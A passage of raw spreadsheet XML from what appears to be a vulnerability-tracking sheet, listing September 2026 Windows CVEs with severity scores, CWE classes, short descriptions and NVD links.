t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q508" s="5" t="inlineStr" /><c r="R508" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S508" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t></is></c></row><row r="509"><c r="A509" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B509" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C509" s="5" t="inlineStr"><is><t>CVE-2026-69421</t></is></c><c r="D509" s="5" t="n"><v>7.8</v></c><c r="E509" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F509" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G509" s="5" t="inlineStr" /><c r="H509" s="5" t="n"><v>0.003</v></c><c r="I509" s="5" t="inlineStr" /><c r="J509" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K50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09" s="5" t="inlineStr" /><c r="M509" s="5" t="inlineStr" /><c r="N509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O509" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P509" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q509" s="5" t="inlineStr" /><c r="R509" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S509" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T509" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t></is></c></row><row r="510"><c r="A510" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B510" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C510" s="5" t="inlineStr"><is><t>CVE-2026-69424</t></is></c><c r="D510" s="5" t="n"><v>7.8</v></c><c r="E510" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F510" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G510" s="5" t="inlineStr" /><c r="H510" s="5" t="n"><v>0.003</v></c><c r="I510" s="5" t="inlineStr" /><c r="J510" s="5" t="inlineStr" /><c r="K510" s="5" t="inlineStr" /><c r="L510" s="5" t="inlineStr" /><c r="M510" s="5" t="inlineStr" /><c r="N510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O510" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P510" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q510" s="5" t="inlineStr" /><c r="R510" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S510" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Distributed File System (DFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69424</t></is></c></row><row r="511"><c r="A511" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B511" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C511" s="5" t="inlineStr"><is><t>CVE-2026-69426</t></is></c><c r="D511" s="5" t="n"><v>7.8</v></c><c r="E511" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F511" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G511" s="5" t="inlineStr" /><c r="H511" s="5" t="n"><v>0.003</v></c><c r="I511" s="5" t="inlineStr" /><c r="J511" s="5" t="inlineStr" /><c r="K511" s="5" t="inlineStr" /><c r="L511" s="5" t="inlineStr" /><c r="M511" s="5" t="inlineStr" /><c r="N511" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P511" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q511" s="5" t="inlineStr" /><c r="R511" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S511" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t></is></c><c r="T511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t></is></c></row><row r="512"><c r="A512" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B512" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C512" s="5" t="inlineStr"><is><t>CVE-2026-69432</t></is></c><c r="D512" s="5" t="n"><v>7.8</v></c><c r="E512" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F512" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G512" s="5" t="inlineStr" /><c r="H512" s="5" t="n"><v>0.003</v></c><c r="I512" s="5" t="inlineStr" /><c r="J512" s="5" t="inlineStr" /><c r="K512" s="5" t="inlineStr" /><c r="L512" s="5" t="inlineStr" /><c r="M512" s="5" t="inlineStr" /><c r="N512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q512" s="5" t="inlineStr" /><c r="R512" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S512" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69432</t></is></c></row><row r="513"><c r="A513" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B513" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C513" s="5" t="inlineStr"><is><t>CVE-2026-69433</t></is></c><c r="D513" s="5" t="n"><v>7.8</v></c><c r="E513" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F513" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G513" s="5" t="inlineStr" /><c r="H513" s="5" t="n"><v>0.003</v></c><c r="I513" s="5" t="inlineStr" /><c r="J513" s="5" t="inlineStr" /><c r="K513" s="5" t="inlineStr" /><c r="L513" s="5" t="inlineStr" /><c r="M513" s="5" t="inlineStr" /><c r="N513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P513" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q513" s="5" t="inlineStr" /><c r="R513" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S513" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t></is></c></row><row r="514"><c r="A514" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B514" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C514" s="5" t="inlineStr"><is><t>CVE-2026-69436</t></is></c><c r="D514" s="5" t="n"><v>7.8</v></c><c r="E514" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F514" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G514" s="5" t="inlineStr" /><c r="H514" s="5" t="n"><v>0.003</v></c><c r="I514" s="5" t="inlineStr" /><c r="J514" s="5" t="inlineStr" /><c r="K514" s="5" t="inlineStr" /><c r="L514" s="5" t="inlineStr" /><c r="M514" s="5" t="inlineStr" /><c r="N514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O514" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P514" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q514" s="5" t="inlineStr" /><c r="R514" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S514" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t></is></c></row><row r="515"><c r="A515" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B515" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C515" s="5" t="inlineStr"><is><t>CVE-2026-69444</t></is></c><c r="D515" s="5" t="n"><v>7.8</v></c><c r="E515" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F515" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G515" s="5" t="inlineStr" /><c r="H515" s="5" t="n"><v>0.003</v></c><c r="I515" s="5" t="inlineStr" /><c r="J515" s="5" t="inlineStr" /><c r="K515" s="5" t="inlineStr" /><c r="L515" s="5" t="inlineStr" /><c r="M515" s="5" t="inlineStr" /><c r="N515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O515" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P515" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q515" s="5" t="inlineStr" /><c r="R515" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S515" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t></is></c></row><row r="516"><c r="A516" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B516" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C516" s="5" t="inlineStr"><is><t>CVE-2026-69445</t></is></c><c r="D516" s="5" t="n"><v>7.8</v></c><c r="E516" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F516" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G516" s="5" t="inlineStr" /><c r="H516" s="5" t="n"><v>0.004</v></c><c r="I516" s="5" t="inlineStr" /><c r="J516" s="5" t="inlineStr" /><c r="K516" s="5" t="inlineStr" /><c r="L516" s="5" t="inlineStr" /><c r="M516" s="5" t="inlineStr" /><c r="N516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O516" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P516" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q516" s="5" t="inlineStr" /><c r="R516" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S516" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t></is></c></row><row r="517"><c r="A517" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B517" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C517" s="5" t="inlineStr"><is><t>CVE-2026-69447</t></is></c><c r="D517" s="5" t="n"><v>7.8</v></c><c r="E517" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F517" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G517" s="5" t="inlineStr" /><c r="H517" s="5" t="n"><v>0.003</v></c><c r="I517" s="5" t="inlineStr" /><c r="J517" s="5" t="inlineStr" /><c r="K517" s="5" t="inlineStr" /><c r="L517" s="5" t="inlineStr" /><c r="M517" s="5" t="inlineStr" /><c r="N517" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P517" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q517" s="5" t="inlineStr" /><c r="R517" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S517" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T517" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t></is></c></row><row r="518"><c r="A518" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B518" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C518" s="5" t="inlineStr"><is><t>CVE-2026-69450</t></is></c><c r="D518" s="5" t="n"><v>7.8</v></c><c r="E518" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F518" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G518" s="5" t="inlineStr" /><c r="H518" s="5" t="n"><v>0.003</v></c><c r="I518" s="5" t="inlineStr" /><c r="J518" s="5" t="inlineStr" /><c r="K518" s="5" t="inlineStr" /><c r="L518" s="5" t="inlineStr" /><c r="M518" s="5" t="inlineStr" /><c r="N518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O518" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P518" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q518" s="5" t="inlineStr" /><c r="R518" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S518" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T518" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t></is></c></row><row r="519"><c r="A519" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B519" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C519" s="5" t="inlineStr"><is><t>CVE-2026-69455</t></is></c><c r="D519" s="5" t="n"><v>7.8</v></c><c r="E519" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F519" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G519" s="5" t="inlineStr" /><c r="H519" s="5" t="n"><v>0.003</v></c><c r="I519" s="5" t="inlineStr" /><c r="J519" s="5" t="inlineStr" /><c r="K519" s="5" t="inlineStr" /><c r="L519" s="5" t="inlineStr" /><c r="M519" s="5" t="inlineStr" /><c r="N519" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P519" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q519" s="5" t="inlineStr" /><c r="R519" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S519" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T519" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t></is></c></row><row r="520"><c r="A520" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B520" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C520" s="5" t="inlineStr"><is><t>CVE-2026-69456</t></is></c><c r="D520" s="5" t="n"><v>7.8</v></c><c r="E520" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F520" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G520" s="5" t="inlineStr" /><c r="H520" s="5" t="n"><v>0.003</v></c><c r="I520" s="5" t="inlineStr" /><c r="J520" s="5" t="inlineStr" /><c r="K520" s="5" t="inlineStr" /><c r="L520" s="5" t="inlineStr" /><c r="M520" s="5" t="inlineStr" /><c r="N520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O520" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P520" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q520" s="5" t="inlineStr" /><c r="R520" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S520" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T520" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t></is></c></row><row r="521"><c r="A521" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B521" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C521" s="5" t="inlineStr"><is><t>CVE-2026-69459</t></is></c><c r="D521" s="5" t="n"><v>7.8</v></c><c r="E521" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F521" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G521" s="5" t="inlineStr" /><c r="H521" s="5" t="n"><v>0.003</v></c><c r="I521" s="5" t="inlineStr" /><c r="J521" s="5" t="inlineStr" /><c r="K521" s="5" t="inlineStr" /><c r="L521" s="5" t="inlineStr" /><c r="M521" s="5" t="inlineStr" /><c r="N521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O521" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P521" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q521" s="5" t="inlineStr" /><c r="R521" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S521" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T521" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t></is></c></row><row r="522"><c r="A522" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B522" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C522" s="5" t="inlineStr"><is><t>CVE-2026-69467</t></is></c><c r="D522" s="5" t="n"><v>7.8</v></c><c r="E522" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F522" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G522" s="5" t="inlineStr" /><c r="H522" s="5" t="n"><v>0.003</v></c><c r="I522" s="5" t="inlineStr" /><c r="J522" s="5" t="inlineStr" /><c r="K522" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L522" s="5" t="inlineStr" /><c r="M522" s="5" t="inlineStr" /><c r="N522" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O522" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P522" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q522" s="5" t="inlineStr" /><c r="R522" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S522" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T522" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t></is></c></row><row r="523"><c r="A523" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B523" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C523" s="5" t="inlineStr"><is><t>CVE-2026-69475</t></is></c><c r="D523" s="5" t="n"><v>7.8</v></c><c r="E523" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F523" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G523" s="5" t="inlineStr" /><c r="H523" s="5" t="n"><v>0.003</v></c><c r="I523" s="5" t="inlineStr" /><c r="J523" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K52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23" s="5" t="inlineStr" /><c r="M523" s="5" t="inlineStr" /><c r="N523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O523" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P523" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q523" s="5" t="inlineStr" /><c r="R523" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S523" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t></is></c></row><row r="524"><c r="A524" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B524" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C524" s="5" t="inlineStr"><is><t>CVE-2026-69476</t></is></c><c r="D524" s="5" t="n"><v>7.8</v></c><c r="E524" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F524" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G524" s="5" t="inlineStr" /><c r="H524" s="5" t="n"><v>0.003</v></c><c r="I524" s="5" t="inlineStr" /><c r="J524" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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24" s="5" t="inlineStr" /><c r="M524" s="5" t="inlineStr" /><c r="N524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O524" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P524" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q524" s="5" t="inlineStr" /><c r="R524" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S524" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t></is></c></row><row r="525"><c r="A525" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B525" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C525" s="5" t="inlineStr"><is><t>CVE-2026-69478</t></is></c><c r="D525" s="5" t="n"><v>7.8</v></c><c r="E525" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F525" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G525" s="5" t="inlineStr" /><c r="H525" s="5" t="n"><v>0.003</v></c><c r="I525" s="5" t="inlineStr" /><c r="J525" s="5" t="inlineStr" /><c r="K525" s="5" t="inlineStr" /><c r="L525" s="5" t="inlineStr" /><c r="M525" s="5" t="inlineStr" /><c r="N525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O525" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P525" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q525" s="5" t="inlineStr" /><c r="R525" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S525" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t></is></c></row><row r="526"><c r="A526" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B526" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C526" s="5" t="inlineStr"><is><t>CVE-2026-69480</t></is></c><c r="D526" s="5" t="n"><v>7.8</v></c><c r="E526" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F526" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G526" s="5" t="inlineStr" /><c r="H526" s="5" t="n"><v>0.003</v></c><c r="I526" s="5" t="inlineStr" /><c r="J526" s="5" t="inlineStr" /><c r="K526" s="5" t="inlineStr" /><c r="L526" s="5" t="inlineStr" /><c r="M526" s="5" t="inlineStr" /><c r="N526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O526" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P526" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q526" s="5" t="inlineStr" /><c r="R526" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S526" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t></is></c></row><row r="527"><c r="A527" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B527" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C527" s="5" t="inlineStr"><is><t>CVE-2026-69489</t></is></c><c r="D527" s="5" t="n"><v>7.8</v></c><c r="E527" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F527" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G527" s="5" t="inlineStr" /><c r="H527" s="5" t="n"><v>0.003</v></c><c r="I527" s="5" t="inlineStr" /><c r="J527" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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27" s="5" t="inlineStr" /><c r="M527" s="5" t="inlineStr" /><c r="N527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P527" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q527" s="5" t="inlineStr" /><c r="R527" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S527" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T527" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t></is></c></row><row r="528"><c r="A528" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B528" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C528" s="5" t="inlineStr"><is><t>CVE-2026-69508</t></is></c><c r="D528" s="5" t="n"><v>7.8</v></c><c r="E528" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F528" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G528" s="5" t="inlineStr" /><c r="H528" s="5" t="n"><v>0.003</v></c><c r="I528" s="5" t="inlineStr" /><c r="J528" s="5" t="inlineStr" /><c r="K528" s="5" t="inlineStr" /><c r="L528" s="5" t="inlineStr" /><c r="M528" s="5" t="inlineStr" /><c r="N528" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O528" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P528" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q528" s="5" t="inlineStr" /><c r="R528" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S528" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T528" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t></is></c></row><row r="529"><c r="A529" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B529" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C529" s="5" t="inlineStr"><is><t>CVE-2026-69509</t></is></c><c r="D529" s="5" t="n"><v>7.8</v></c><c r="E529" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F529" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G529" s="5" t="inlineStr" /><c r="H529" s="5" t="n"><v>0.003</v></c><c r="I529" s="5" t="inlineStr" /><c r="J529" s="5" t="inlineStr" /><c r="K529" s="5" t="inlineStr" /><c r="L529" s="5" t="inlineStr" /><c r="M529" s="5" t="inlineStr" /><c r="N529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O529" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P529" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q529" s="5" t="inlineStr" /><c r="R529" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S529" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t></is></c></row><row r="530"><c r="A530" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B530" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C530" s="5" t="inlineStr"><is><t>CVE-2026-69513</t></is></c><c r="D530" s="5" t="n"><v>7.8</v></c><c r="E530" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F530" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G530" s="5" t="inlineStr" /><c r="H530" s="5" t="n"><v>0.003</v></c><c r="I530" s="5" t="inlineStr" /><c r="J530" s="5" t="inlineStr" /><c r="K530" s="5" t="inlineStr" /><c r="L530" s="5" t="inlineStr" /><c r="M530" s="5" t="inlineStr" /><c r="N530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O530" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P530" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q530" s="5" t="inlineStr" /><c r="R530" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S530" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t></is></c></row><row r="531"><c r="A531" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B531" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C531" s="5" t="inlineStr"><is><t>CVE-2026-69528</t></is></c><c r="D531" s="5" t="n"><v>7.8</v></c><c r="E531" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F531" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G531" s="5" t="inlineStr" /><c r="H531" s="5" t="n"><v>0.003</v></c><c r="I531" s="5" t="inlineStr" /><c r="J531" s="5" t="inlineStr" /><c r="K531" s="5" t="inlineStr" /><c r="L531" s="5" t="inlineStr" /><c r="M531" s="5" t="inlineStr" /><c r="N531" s="5" 